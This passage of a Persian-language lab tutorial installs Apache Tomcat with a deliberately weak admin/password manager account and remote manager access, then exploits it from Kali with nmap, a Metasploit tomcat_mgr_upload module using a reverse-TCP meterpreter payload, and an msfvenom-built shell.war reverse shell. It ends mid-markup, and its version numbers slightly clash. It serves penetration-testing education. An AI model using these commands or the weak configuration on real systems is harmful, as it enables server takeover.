https:\/\/archive.apache.org\/dist\/tomcat\/tomcat-10\/v10.0.20\/bin\/apache-tomcat-10.0.20.tar.gz\r\ntar -xvf apache-tomcat-10.1.20.tar.gz\r\n<\/pre>\n<p><img decoding=\"async\" class=\"alignnone  wp-image-19475\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/3-8-300x108.png\" alt=\"\" width=\"561\" height=\"202\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/3-8-300x108.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/3-8-1024x370.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/3-8-768x277.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/3-8-150x54.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/3-8.png 1377w\" sizes=\"(max-width: 561px) 100vw, 561px\" 
\/><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u0648\u0634\u0647\u200c\u06cc extract \u0634\u062f\u0647 \u0631\u0627 \u0628\u0647 \u0645\u0633\u06cc\u0631 \/opt\/tomcat \u0645\u0646\u062a\u0642\u0644 \u06a9\u0631\u062f\u0647\u060c \u0645\u0627\u0644\u06a9\u06cc\u062a (ownership) \u0622\u0646 \u0631\u0627 \u0628\u0647 \u06a9\u0627\u0631\u0628\u0631 tomcat \u0648\u0627\u06af\u0630\u0627\u0631 \u06a9\u0646\u06cc\u062f \u0648 \u0645\u062c\u0648\u0632 \u0627\u062c\u0631\u0627 (execution permission) \u0631\u0627 \u0628\u0631\u0627\u06cc \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc binary \u062a\u0646\u0638\u06cc\u0645 \u0646\u0645\u0627\u06cc\u06cc\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">mv apache-tomcat-10.1.20\/* \/opt\/tomcat\r\nchown -R tomcat: \/opt\/tomcat\r\nsh -c 'chmod +x \/opt\/tomcat\/bin\/*.sh '\r\n<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19476\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/4-7-300x79.png\" alt=\"\" width=\"566\" height=\"149\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/4-7-300x79.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/4-7-768x202.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/4-7-150x39.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/4-7.png 815w\" sizes=\"(max-width: 566px) 100vw, 566px\" \/><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">[Unit]\r\nDescription=Apache Tomcat\r\nAfter=network.target\r\n\r\n[Service]\r\nType=forking\r\n\r\nUser=tomcat\r\nGroup=tomcat\r\n\r\nEnvironment=JAVA_HOME=\/usr\/lib\/jvm\/java-11-openjdk-amd64\r\nEnvironment=CATALINA_PID=\/opt\/tomcat\/tomcat.pid\r\nEnvironment=CATALINA_HOME=\/opt\/tomcat\r\nEnvironment=CATALINA_BASE=\/opt\/tomcat\r\nEnvironment=\"CATALINA_OPTS=-Xms512M -Xmx1024M -server 
-XX:+UseParallelGC\"\r\n\r\nExecStart=\/opt\/tomcat\/bin\/startup.sh\r\nExecStop=\/opt\/tomcat\/bin\/shutdown.sh\r\n\r\nExecReload=\/bin\/kill $MAINPID\r\nRemainAfterExit=yes\r\n\r\n[Install]\r\nWantedBy=multi-user.target<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19477\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/5-8-300x210.png\" alt=\"\" width=\"514\" height=\"360\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/5-8-300x210.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/5-8-768x537.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/5-8-150x105.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/5-8.png 891w\" sizes=\"(max-width: 514px) 100vw, 514px\" \/><\/p>\n<p>\u0628\u0631\u0627\u06cc \u0627\u0639\u0645\u0627\u0644 \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a\u060c daemon \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 systemd \u0631\u0627 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 reload \u06a9\u0646\u06cc\u062f. \u0647\u0645\u0686\u0646\u06cc\u0646\u060c \u0633\u0631\u0648\u06cc\u0633 tomcat \u0631\u0627 enable \u06a9\u0646\u06cc\u062f \u062a\u0627 \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u062e\u0648\u062f\u06a9\u0627\u0631 \u0647\u0646\u06af\u0627\u0645 reboot \u0633\u06cc\u0633\u062a\u0645 \u0627\u062c\u0631\u0627 \u0634\u0648\u062f. 
\u0628\u0631\u0627\u06cc \u0628\u0631\u0631\u0633\u06cc \u0648\u0636\u0639\u06cc\u062a (status) \u0633\u0631\u0648\u06cc\u0633 tomcat \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">systemctl daemon-reload\r\nsystemctl enable --now tomcat\r\nsystemctl status tomcat\r\n<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19478\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/6-7-300x148.png\" alt=\"\" width=\"545\" height=\"269\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/6-7-300x148.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/6-7-1024x505.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/6-7-768x379.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/6-7-150x74.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/6-7.png 1057w\" sizes=\"(max-width: 545px) 100vw, 545px\" \/><\/p>\n<h2><strong>\u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc<\/strong><\/h2>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u0627\u062a\u0645\u0627\u0645 \u0641\u0631\u0627\u06cc\u0646\u062f \u0646\u0635\u0628\u060c \u0646\u0648\u0628\u062a \u0628\u0647 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0633\u0631\u0648\u0631 Tomcat \u0645\u06cc\u200c\u0631\u0633\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u0627\u06cc\u062c\u0627\u062f \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u06a9\u0627\u0631\u0628\u0631 admin\u060c \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a \u0645\u0648\u0631\u062f \u0646\u06cc\u0627\u0632 \u0631\u0627 \u062f\u0631 \u0641\u0627\u06cc\u0644 \u0632\u06cc\u0631 \u0627\u0639\u0645\u0627\u0644 \u06a9\u0646\u06cc\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" 
data-enlighter-language=\"generic\">nano \/opt\/tomcat\/conf\/tomcat-users.xml<\/pre>\n<p><span style=\"font-size: 10pt\">\u0642\u0637\u0639\u0647 \u06a9\u062f \u0632\u06cc\u0631 \u0631\u0627 \u0642\u0628\u0644 \u0627\u0632 \u062a\u06af &lt;\/tomcat-users&gt; \u062f\u0631 \u0641\u0627\u06cc\u0644 \u0627\u0636\u0627\u0641\u0647 \u06a9\u0646\u06cc\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">&lt;role rolename=\"admin-gui\"\/&gt;\r\n&lt;role rolename=\"manager-gui\"\/&gt;\r\n&lt;user username=\"admin\" password=\"password\" roles=\"admin-gui,manager-gui\"\/&gt;\r\n<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19479\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/7-6-298x300.png\" alt=\"\" width=\"560\" height=\"564\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/7-6-298x300.png 298w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/7-6-150x151.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/7-6-768x773.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/7-6-96x96.png 96w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/7-6.png 982w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u0641\u0639\u0627\u0644\u200c\u06a9\u0631\u062f\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0628\u0647 \u0628\u062e\u0634 Tomcat Manager\u060c \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a \u0631\u0627 \u062f\u0631 \u0641\u0627\u06cc\u0644 context.xml \u06a9\u0647 \u062f\u0631 \u062f\u0627\u06cc\u0631\u06a9\u062a\u0648\u0631\u06cc\u200c\u0647\u0627\u06cc \u0632\u06cc\u0631 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f\u060c \u0627\u0639\u0645\u0627\u0644 \u06a9\u0646\u06cc\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">nano \/opt\/tomcat\/webapps\/manager\/META-INF\/context.xml\r\nnano 
\/opt\/tomcat\/webapps\/host-manager\/META-INF\/context.xml\r\n<\/pre>\n<p><span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc \u06a9\u0627\u0645\u0644 \u062f\u0633\u062a\u0631\u0633\u06cc \u0631\u0627\u0647 \u062f\u0648\u0631 (remote access) \u0628\u0647 Tomcat Manager\u060c \u062e\u0637 \u0632\u06cc\u0631 \u0631\u0627 \u0627\u0632 \u0647\u0631 \u062f\u0648 \u0641\u0627\u06cc\u0644 \u062d\u0630\u0641 \u06a9\u0646\u06cc\u062f.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19480\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/8-4-300x18.png\" alt=\"\" width=\"534\" height=\"32\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/8-4-300x18.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/8-4-768x45.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/8-4-150x9.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/8-4.png 905w\" sizes=\"(max-width: 534px) 100vw, 534px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19481\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/9-6-300x173.png\" alt=\"\" width=\"524\" height=\"302\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/9-6-300x173.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/9-6-1024x592.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/9-6-768x444.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/9-6-150x87.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/9-6.png 1059w\" sizes=\"(max-width: 524px) 100vw, 524px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u0627\u062a\u0645\u0627\u0645 \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a\u060c \u0628\u0631\u0627\u06cc \u0627\u0639\u0645\u0627\u0644 
\u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u062c\u062f\u06cc\u062f\u060c \u0633\u0631\u0648\u06cc\u0633 tomcat \u0631\u0627 \u062f\u0631 Ubuntu \u0628\u0627 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0631\u0627\u0647\u200c\u0627\u0646\u062f\u0627\u0632\u06cc \u0645\u062c\u062f\u062f \u06a9\u0646\u06cc\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">systemctl restart tomcat<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19482\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/10-6-300x27.png\" alt=\"\" width=\"522\" height=\"47\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/10-6-300x27.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/10-6-150x14.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/10-6.png 616w\" sizes=\"(max-width: 522px) 100vw, 522px\" \/><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">sudo netstat -tulnp | grep 8080\r\nsudo ss -tulwn | grep 8080<\/pre>\n<p><span style=\"font-size: 10pt\">\u0647\u0645\u0686\u0646\u06cc\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u062f\u0631 \u0645\u0631\u0648\u0631\u06af\u0631 \u062e\u0648\u062f \u0622\u062f\u0631\u0633 \u0632\u06cc\u0631 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f:<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19483\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/11-5-300x213.png\" alt=\"\" width=\"531\" height=\"377\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/11-5-300x213.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/11-5-1024x727.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/11-5-768x545.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/11-5-150x106.png 150w, 
https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/11-5.png 1447w\" sizes=\"(max-width: 531px) 100vw, 531px\" \/><\/p>\n<h2><strong>\u0634\u0646\u0627\u0633\u0627\u06cc\u06cc<\/strong><\/h2>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u0627\u062a\u0645\u0627\u0645 \u0646\u0635\u0628 \u00a0\u0648 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u060c \u0627\u06a9\u0646\u0648\u0646 \u0648\u0627\u0631\u062f \u0645\u0631\u062d\u0644\u0647\u200c\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc (enumeration) \u0645\u06cc\u200c\u0634\u0648\u06cc\u0645.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0633\u0646\u0627\u0631\u06cc\u0648\u060c \u0627\u0632 Kali Linux \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 \u0645\u0627\u0634\u06cc\u0646 \u062d\u0645\u0644\u0647\u200c\u06a9\u0646\u0646\u062f\u0647 \u00a0\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645.<\/span><br \/>\n<span style=\"font-size: 10pt\">\u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0627\u0648\u0644\u06cc\u0647 \u0631\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0628\u0627 \u0627\u0628\u0632\u0627\u0631 nmap \u0627\u0646\u062c\u0627\u0645 \u062f\u0627\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">nmap -p 8080 -sV 192.168.1.5<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19484\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/12-3-300x86.png\" alt=\"\" width=\"488\" height=\"140\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/12-3-300x86.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/12-3-768x221.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/12-3-150x43.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/12-3.png 919w\" sizes=\"(max-width: 488px) 100vw, 488px\" 
\/><\/p>\n<h2><strong>\u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc<\/strong> <strong>\u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632<\/strong><strong> Metasploit Framework<\/strong><\/h2>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647 \u0627\u0628\u062a\u062f\u0627 \u062a\u0644\u0627\u0634 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645 \u0627\u0632 \u0642\u0627\u0628\u0644\u06cc\u062a \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u00a0\u0645\u0648\u062c\u0648\u062f \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u06a9\u0646\u06cc\u0645\u060c \u0686\u0631\u0627 \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc upload \u0641\u0627\u06cc\u0644 \u062f\u0631 Tomcat\u060c \u0627\u0632 \u0642\u0628\u0644 \u06cc\u06a9 exploit \u0622\u0645\u0627\u062f\u0647 \u062f\u0631 Metasploit \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u0648\u0631\u0648\u062f \u0628\u0647 \u0645\u062d\u06cc\u0637 Metasploit\u060c \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0632\u06cc\u0631 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f \u062a\u0627 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0627\u062c\u0631\u0627 \u0634\u0648\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">use exploit\/multi\/http\/tomcat_mgr_upload\r\nset RHOSTS &lt;target-ip&gt;\r\nset RPORT 8080\r\nset HTTPUSERNAME &lt;admin-username&gt;\r\nset HTTPPASSWORD &lt;admin-password&gt;\r\nset TARGETURI \/manager\r\nset PAYLOAD java\/meterpreter\/reverse_tcp\r\nset LHOST &lt;attacker-ip&gt;\r\nset LPORT &lt;attacker-port&gt;\r\nrun\r\n<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19485\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/13-2-300x289.png\" alt=\"\" 
width=\"527\" height=\"508\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/13-2-300x289.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/13-2-1024x985.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/13-2-768x739.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/13-2-150x144.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/13-2.png 1244w\" sizes=\"(max-width: 527px) 100vw, 527px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u0647\u0645\u0627\u0646\u200c\u0637\u0648\u0631 \u06a9\u0647 \u062f\u0631 \u0628\u0627\u0644\u0627 \u0645\u0634\u0627\u0647\u062f\u0647 \u0634\u062f\u060c \u067e\u0633 \u0627\u0632 \u0627\u062c\u0631\u0627\u06cc \u0645\u0648\u0641\u0642 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a\u060c \u06cc\u06a9 reverse shell \u0628\u0647 \u062f\u0633\u062a \u0645\u06cc\u200c\u0622\u06cc\u062f \u0648 \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0631\u0627 \u0627\u0632 \u0637\u0631\u06cc\u0642 meterpreter shell \u0627\u062c\u0631\u0627 \u06a9\u0646\u062f.<\/span><\/p>\n<h2><strong>\u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u062f\u0633\u062a\u06cc<\/strong> <strong>\u2014 <\/strong><strong>\u062f\u0631\u06cc\u0627\u0641\u062a<\/strong><strong> Reverse Shell<\/strong><\/h2>\n<p><span style=\"font-size: 10pt\">\u0639\u0644\u0627\u0648\u0647 \u0628\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Metasploit\u060c \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0647\u0645\u06cc\u0646 \u0641\u0631\u0627\u06cc\u0646\u062f \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0631\u0627 \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u062f\u0633\u062a\u06cc \u0646\u06cc\u0632 \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u0646\u062f.<\/span><\/p>\n<p><span 
style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u0627\u06cc\u0646 \u06a9\u0627\u0631\u060c \u0627\u0648\u0644\u06cc\u0646 \u0642\u062f\u0645\u060c \u0633\u0627\u062e\u062a \u06cc\u06a9 \u0641\u0627\u06cc\u0644 .war (\u0641\u0627\u06cc\u0644 Web Application Archive \u0645\u062e\u0635\u0648\u0635 \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc Java) \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0628\u0632\u0627\u0631 msfvenom \u0627\u0633\u062a.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">msfvenom -p java\/jsp_shell_reverse_tcp lhost=192.168.1.7 lport=1234 -f war &gt; shell.war<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19486\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/14-2-300x35.png\" alt=\"\" width=\"523\" height=\"61\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/14-2-300x35.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/14-2-1024x120.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/14-2-768x90.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/14-2-150x18.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/14-2.png 1284w\" sizes=\"(max-width: 523px) 100vw, 523px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u0633\u0627\u062e\u062a \u0641\u0627\u06cc\u0644 shell.war\u060c \u0645\u0647\u0627\u062c\u0645 \u0628\u0627\u06cc\u062f \u0622\u0646 \u0631\u0627 \u062f\u0631 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0645\u062f\u06cc\u0631\u06cc\u062a\u06cc Tomcat Manager App \u0622\u067e\u0644\u0648\u062f \u06a9\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0628\u062e\u0634 Manager App\u060c \u06a9\u0627\u0631\u0628\u0631 \u0628\u0627\u06cc\u062f Basic Authentication 
\u0627\u0631\u0627\u0626\u0647 \u062f\u0647\u062f.<\/span><br \/>\n<span style=\"font-size: 10pt\">\u0645\u0639\u0645\u0648\u0644\u0627\u064b \u0646\u0627\u0645 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0648 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u067e\u06cc\u0634\u200c\u0641\u0631\u0636 (\u062f\u0631 \u0627\u06cc\u0646 \u0633\u0646\u0627\u0631\u06cc\u0648\u060c \u0647\u0645\u0627\u0646 \u0645\u0642\u0627\u062f\u06cc\u0631\u06cc \u06a9\u0647 \u062f\u0631 \u0645\u0631\u062d\u0644\u0647\u200c\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u062f\u0631 \u0641\u0627\u06cc\u0644 tomcat-users.xml \u062a\u0639\u0631\u06cc\u0641 \u0634\u062f) \u0628\u0647 \u0635\u0648\u0631\u062a \u0632\u06cc\u0631 \u0627\u0633\u062a:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">username: admin<\/span><\/li>\n<li><span style=\"font-size: 10pt\">password: password<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0627\u0639\u062a\u0628\u0627\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627 \u0628\u0631\u0627\u06cc \u0648\u0631\u0648\u062f \u0628\u0647 Tomcat Manager App \u0648 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0631\u0627\u0628\u0637 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0622\u0646 \u062c\u0647\u062a \u0622\u067e\u0644\u0648\u062f \u0641\u0627\u06cc\u0644\u200c\u0647\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19487\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/15-2-300x231.png\" alt=\"\" width=\"571\" height=\"440\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/15-2-300x231.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/15-2-1024x790.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/15-2-768x592.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/15-2-390x300.png 390w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/15-2-150x116.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/15-2.png 1282w\" sizes=\"(max-width: 571px) 100vw, 571px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u0648\u0631\u0648\u062f \u0628\u0647 \u0633\u06cc\u0633\u062a\u0645 \u060c 
\u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0641\u0627\u06cc\u0644 shell.war \u06a9\u0647 \u0627\u0632 \u0642\u0628\u0644 \u0627\u06cc\u062c\u0627\u062f \u0634\u062f\u0647 \u0627\u0633\u062a \u0631\u0627 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0642\u0627\u0628\u0644\u06cc\u062a WAR file deployment \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u06a9\u0646\u062f.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19488\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/16-2-300x179.png\" alt=\"\" width=\"535\" height=\"319\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/16-2-300x179.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/16-2-1024x611.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/16-2-768x458.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/16-2-150x89.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/16-2.png 1252w\" sizes=\"(max-width: 535px) 100vw, 535px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u0627\u0646\u062c\u0627\u0645 upload\u060c \u0641\u0627\u06cc\u0644 \u062f\u0631 \u0628\u062e\u0634 Uploaded WAR files \u0642\u0627\u0628\u0644 \u0645\u0634\u0627\u0647\u062f\u0647 \u062e\u0648\u0627\u0647\u062f \u0628\u0648\u062f.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" 